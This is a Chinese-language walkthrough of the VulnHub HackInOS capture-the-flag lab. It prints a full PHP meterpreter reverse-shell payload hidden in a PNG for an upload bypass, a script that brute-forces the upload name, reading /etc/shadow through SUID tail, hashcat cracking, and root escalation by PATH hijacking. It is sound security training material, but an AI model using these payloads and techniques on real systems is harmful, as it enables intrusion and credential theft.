一、環境配置
攻擊機kali搭建在Vmware,橋接模式,ip:192.168.43.48
靶機HackInOS需要用VirtualBox導入ova文件,橋接模式,啟動完成之后, 選擇Ubuntu系統,因為是模擬攻擊就先不登錄靶機,ip:192.168.43.104
(靶機下載地址:https://download.vulnhub.com/hackinos/HackInOS.ova)
二、信息收集
nmap探測開放的端口信息(-A操作系統和版本檢測,-p-全端口掃描)
命令和輸出為
root@kali:~# nmap -A -p- 192.168.43.104 Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-16 13:31 CST Nmap scan report for vulnvm (192.168.43.104) Host is up (0.00096s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA) | 256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA) |_ 256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519) 8000/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-generator: WordPress 5.0.3 |_http-open-proxy: Proxy might be redirecting requests | http-robots.txt: 2 disallowed entries |_/upload.php /uploads |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blog – Just another WordPress site MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.96 ms vulnvm (192.168.43.104) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.50 seconds
從掃描可以看出,靶機開放了22端口(SSH服務)和8000端口(HTTP服務),並且8000端口運行着一個WordPress博客進程,還有一個upload.php文件和一個uploads目錄
瀏覽器訪問192.168.43.104:8000,看一下WordPress的博客
http://192.168.43.104:8000/upload.php 頁面有一個文件上傳功能
三、文件上傳漏洞利用
訪問頁面源代碼,發現一個hint鏈接
訪問 https://github.com/fatihhcelik/Vulnerable-Machine---Hint 發現upload.php源碼
<!DOCTYPE html> <html> <body> <div align="center"> <form action="" method="post" enctype="multipart/form-data"> <br> <b>Select image : </b> <input type="file" name="file" id="file" style="border: solid;"> <input type="submit" value="Submit" name="submit"> </form> </div> <?php // Check if image file is a actual image or fake image if(isset($_POST["submit"])) { $rand_number = rand(1,100); $target_dir = "uploads/"; $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number)); $file_name = $target_dir . basename($_FILES["file"]["name"]); $uploadOk = 1; $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION)); $type = $_FILES["file"]["type"]; $check = getimagesize($_FILES["file"]["tmp_name"]); if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){ $uploadOk = 1; }else{ $uploadOk = 0; echo ":)"; } if($uploadOk == 1){ move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType); echo "File uploaded /uploads/?"; } } ?> </body> </html>
代碼審計發現,只允許上傳PNG或GIF格式的圖片,校驗方式是校驗文件內容(實際校驗的是文件開頭幾個標志文件類型的字節,PNG格式為0x890x500x4E0x470x0D0x0A0x1A0x0A,GIF格式為GIF98)
沒有校驗文件后綴,通過校驗的文件會保存在uploads目錄中,文件名是一個隨機生成的md5值,而后綴保持上傳文件的后綴不變
所以可以先做一個圖片馬,主要是反彈shell的馬,利用Metasploit來生成
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.48 lport=4444 -f raw [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1114 bytes /*<?php /**/ error_reporting(0); $ip = '192.168.43.48'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
把生成的Payload保存到文件backdoor.php中,然后隨便找一張png圖片water.png,把backdoor.php附件到water.png的后面
root@kali:~/baji# cat backdoor.php >> water.png root@kali:~/baji# mv water.png water.php
打開Metasploit,進入exploit/multi/handler模塊,設置Payload和監聽主機、監聽端口等參數,等待反彈shell的連接
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(multi/handler) > set lport 4444 lport => 4444 msf exploit(multi/handler) > set lhost 192.168.43.48 lhost => 192.168.43.48 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.43.48:4444
接着上傳含有后門的圖片
因為文件名是隨機的md值,寫個小腳本爆破
import hashlib import requests for i in range(101): file_name = hashlib.md5('water.php'+str(i)).hexdigest() r = requests.get('http://192.168.43.104:8000/uploads/{}.php'.format(file_name))
出現一次運行腳本並沒有反彈成功的情況,notepad查看圖片馬發現payload前一部分沒有解析成php文件,可能與圖片結尾處有關,換一個png圖片問題解決
運行這個腳本,可以在Metasploit中看到反彈連接成功,getuid命令看看權限
四、提權
4.1Linux提權信息收集
看一下文件夾中有哪些文件
打開wp-config.php文件,是數據庫連接信息,用的是mysql
sysinfo看一下系統信息,主機名是1afdd1f6b82c,看起來像是在docker中,進一步確認一下,確實在docker中
meterpreter > run post/linux/gather/checkcontainer [+] This appears to be a 'Docker' container
上傳一個Linux提權信息收集腳本並運行(下載地址:https://www.securitysift.com/download/linuxprivchecker.py)
這個腳本的輸出很多,仔細閱讀,注意到tail被設置了SUID
(SUID是一種特殊權限,設置了SUID的程序文件,在用戶執行該程序時,用戶的權限是該程序文件屬主的權限。例如程序文件的屬主是root,那么執行該程序的用戶就將暫時獲得root賬戶的權限。SGID與SUID類似,只是執行程序時獲得的是文件屬組的權限)
(tail 命令可用於查看文件的內容,有一個常用的參數 -f 常用於查閱正在改變的日志文件。tail -f filename 會把 filename 文件里的最尾部的內容顯示在屏幕上,並且不斷刷新,只要 filename 更新就可以看到最新的文件內容。
格式:
tail [參數] [文件]
參數:
- -f 循環讀取
- -q 不顯示處理信息
- -v 顯示詳細的處理信息
- -c<數目> 顯示的字節數
- -n<行數> 顯示文件的尾部 n 行內容
- --pid=PID 與-f合用,表示在進程ID,PID死掉之后結束
- -q,--quiet,--silent 從不輸出給出文件名的首部
- -s,--sleep-interval=S 與-f合用,表示在每次反復的間隔休眠S秒)
(/etc/shadow 文件用於存儲 Linux 系統中用戶的密碼信息,又稱為“影子文件”,只有 root 用戶擁有讀權限,其他用戶沒有任何權限,這樣就保證了用戶密碼的安全性)
4.2root密碼破解
直接用tail讀取/etc/shadow文件,得到了root用戶密碼的hash值
meterpreter > shell Process 947 created. Channel 3 created. tail -c1G /etc/shadow root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7::: daemon:*:17931:0:99999:7::: bin:*:17931:0:99999:7::: sys:*:17931:0:99999:7::: sync:*:17931:0:99999:7::: games:*:17931:0:99999:7::: man:*:17931:0:99999:7::: lp:*:17931:0:99999:7::: mail:*:17931:0:99999:7::: news:*:17931:0:99999:7::: uucp:*:17931:0:99999:7::: proxy:*:17931:0:99999:7::: www-data:*:17931:0:99999:7::: backup:*:17931:0:99999:7:::
($6$開頭的,表明是用SHA-512加密的,$qoj6/JJi$這里中間表示鹽,FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/是密文,另外$1$是md5加密,$2$是blowfish加密,$5$是SHA-256加密)
新建一個root.hash文件,將上面的哈希值保存進去,hashcat破解root密碼為john(-w 3指定電力消耗;-a 0純字典;-m hash type該選項主要是哈希函數的類型,使用hashcat -h 可以查看支持類型,-m 1800是sha512 Linux加密)
root@kali:~/baji# hashcat -w 3 -a 0 -m 1800 -o root.out root.hash /usr/share/metasploit-framework/data/wordlists/common_roots.txt --force hashcat (v4.1.0) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 512/1432 MB allocatable, 2MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt * Uses-64-Bit Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll' * Device #1: Kernel m01800.013e5254.kernel not found in cache! Building may take a while... * Device #1: Kernel amp_a0.f29ab412.kernel not found in cache! Building may take a while... Dictionary cache built: * Filename..: /usr/share/metasploit-framework/data/wordlists/common_roots.txt * Passwords.: 4725 * Bytes.....: 37000 * Keyspace..: 4725 * Runtime...: 0 secs Session..........: hashcat Status...........: Cracked Hash.Type........: sha512crypt $6$, SHA512 (Unix) Hash.Target......: $6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvE...GHova/ Time.Started.....: Mon Feb 17 12:57:07 2020 (28 secs) Time.Estimated...: Mon Feb 17 12:57:35 2020 (0 secs) Guess.Base.......: File (/usr/share/metasploit-framework/data/wordlists/common_roots.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 108 H/s (66.71ms) @ Accel:256 Loops:64 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 3072/4725 (65.02%) Rejected.........: 0/3072 (0.00%) Restore.Point....: 2560/4725 (54.18%) Candidates.#1....: ihateyou -> lunita HWMon.Dev.#1.....: N/A Started: Mon Feb 17 12:56:11 2020 Stopped: Mon Feb 17 12:57:35 2020 root@kali:~/baji# cat root.out $6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:john
還可以用kali自帶的john工具破解,還沒有用過,測試一下也可以成功破解密碼為john
4.3python偽造終端
但直接輸入su root會提示“must be run from a terminal”,所以先用Python偽造一個終端(直接在低權shell里面用sudo是不奏效的。這是因為出於安全考慮,linux要求用戶必須從終端設備(tty)中輸入密碼,而不是標准輸入(stdin)。換句話說,sudo在你輸入密碼的時候本質上是讀取了鍵盤,而不是bash里面輸入的字符。因此為了能夠輸入密碼,我們必須模擬一個終端設備。python就有這樣的功能)
meterpreter > shell Process 1484 created. Channel 5 created. su root su: must be run from a terminal python -c "import pty;pty.spawn('/bin/bash');" www-data@1afdd1f6b82c:/var/www/html$ su root su root Password: john root@1afdd1f6b82c:/var/www/html#
五、探索容器
按照慣例,查看/root中的flag,發現不是真實flag,是一句提示
在Linux提權信息收集的步驟還有一個知道用戶名和密碼的數據庫沒有嘗試,先登錄數據庫看看,列出所有的表
root@1afdd1f6b82c:/var/www/html# mysql -h db -u wordpress -p wordpress mysql -h db -u wordpress -p wordpress Enter password: wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 70 Server version: 5.7.25 MySQL Community Server (GPL) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [wordpress]> show tables; show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | host_ssh_cred | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 13 rows in set (0.01 sec)
看到了一個名為“host_ssh_cred”的表,查看其內容,看到了一對用戶名和密碼,密碼應該是某種hash值,數了下長度是32字符,推測是md5值,在線網站解密明文為“123456”
MySQL [wordpress]> select * from host_ssh_cred; select * from host_ssh_cred; +-------------------+----------------------------------+ | id | pw | +-------------------+----------------------------------+ | hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e | +-------------------+----------------------------------+ 1 row in set (0.05 sec)
六、SSH連接
攻擊機用這個用戶名和密碼登錄目標系統的22端口,登錄成功
root@kali:~# ssh hummingbirdscyber@192.168.43.104 The authenticity of host '192.168.43.104 (192.168.43.104)' can't be established. ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.43.104' (ECDSA) to the list of known hosts. hummingbirdscyber@192.168.43.104's password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-29-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 120 packages can be updated. 0 updates are security updates. *** System restart required *** Last login: Fri Mar 1 23:58:08 2019 from 192.168.1.31 hummingbirdscyber@vulnvm:~$
看這個用戶名像在docker里面,查看一下確實在docker里面
docker權限就能讀到/root中的文件了(-i讓輸入輸出都在標准控制台進行;-t分配一個tty;-v將/root掛載到容器中;使用鏡像ubuntu以交互模式啟動一個容器,在容器內執行/bin/bash命令;將/root路徑下的文件映射到docker的根目錄下)但是出現了錯誤,搜索了一下應該是docker版本與系統對應的問題,沒能解決,成功映射后就能在/root/flag發現flag了
hummingbirdscyber@vulnvm:~$ docker run -it -v /:/root ubuntu /bin/bash docker: Error response from daemon: failed to start shim: exec: "docker-containerd-shim": executable file not found in $PATH: unknown.
七、再次提權
因為沒能拿到flag,顯然“hummingbirdscyber”也是一個低權限賬戶,看到網上有通過命令劫持提權的思路,實驗一下
先枚舉具有SUID權限的所有二進制文件,看到了十分奇怪的“/home/hummingbirdscyber/Desktop/a.out”
hummingbirdscyber@vulnvm:~$ ls -lh $(find / -perm -u=s -type f 2>/dev/null) -rwsr-xr-x 1 root root 31K Tem 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 40K May 16 2018 /bin/mount -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 40K May 17 2017 /bin/su -rwsr-xr-x 1 root root 27K May 16 2018 /bin/umount -rwsr-xr-x 1 root root 8,6K Mar 1 2019 /home/hummingbirdscyber/Desktop/a.out -rwsr-xr-x 1 root root 49K May 17 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 40K May 17 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 74K May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39K May 17 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 53K May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 23K Mar 27 2019 /usr/bin/pkexec -rwsr-xr-x 1 root root 134K Oca 31 21:37 /usr/bin/sudo -rwsr-xr-- 1 root messagebus 42K Haz 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10K Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 419K Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 15K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-sr-x 1 root root 97K Mar 18 2019 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 19K Mar 18 2017 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox -rwsr-sr-x 1 root root 11K Eki 25 2018 /usr/lib/xorg/Xorg.wrap -rwsr-xr-- 1 root dip 386K Haz 12 2018 /usr/sbin/pppd
運行a.out后會輸出root,然后用strings命令還看到了whoami,猜測這個程序是root權限並且程序里面調用了system("whoami")命令,所以我們可以把想辦法把whoami這個命令在機器上替換為system("/bin/bash")
查找一下PATH的位置
首先寫一個自己的whoami文件,內容為運行一個shell,然后我們編譯它得到可執行文件whoami,然后再創建一個bin文件夾,將whoami放進去,最后運行a.out程序即可提權,成功得到flag
#include <stdlib.h> int main(void) { system("/bin/bash"); return 0; }
hummingbirdscyber@vulnvm:~$ vi whoami.c hummingbirdscyber@vulnvm:~$ gcc whoami.c -o whoami hummingbirdscyber@vulnvm:~$ mkdir bin hummingbirdscyber@vulnvm:~$ mv whoami bin/ hummingbirdscyber@vulnvm:~$ Desktop/a.out root@vulnvm:~# cat /root/flag Congratulations! -ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. ` root@vulnvm:~#
八、總結
通過這個靶機實驗了三種提權方式:
1.利用SUID可執行文件執行root操作
2.利用docker提權
3.利用環境變量提權
參考:
https://blog.csdn.net/wn314/article/details/90523507
https://www.freebuf.com/column/218556.html